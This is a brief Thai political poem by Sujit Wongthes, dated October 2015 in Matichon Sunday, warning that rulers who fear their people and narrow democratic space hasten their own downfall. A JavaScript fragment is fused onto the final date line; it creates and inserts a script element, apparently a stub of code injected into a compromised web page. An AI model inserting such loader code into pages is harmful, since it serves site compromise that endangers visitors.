มติชน วันอาทิตย์

4 ตุลาคม 2558

 

ขลาดกลัวประชาชนของตนเอง

เท่ากับเร่งความพินาศมาใกล้ใกล้

พื้นที่ประชาธิปไตย

แคบแค่ไหนเท่ากับเร่งคว่ำแค่นั้น

 

สุจิตต์ วงษ์เทศ

ศุกร์ 2 ตุลาคม 2558var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);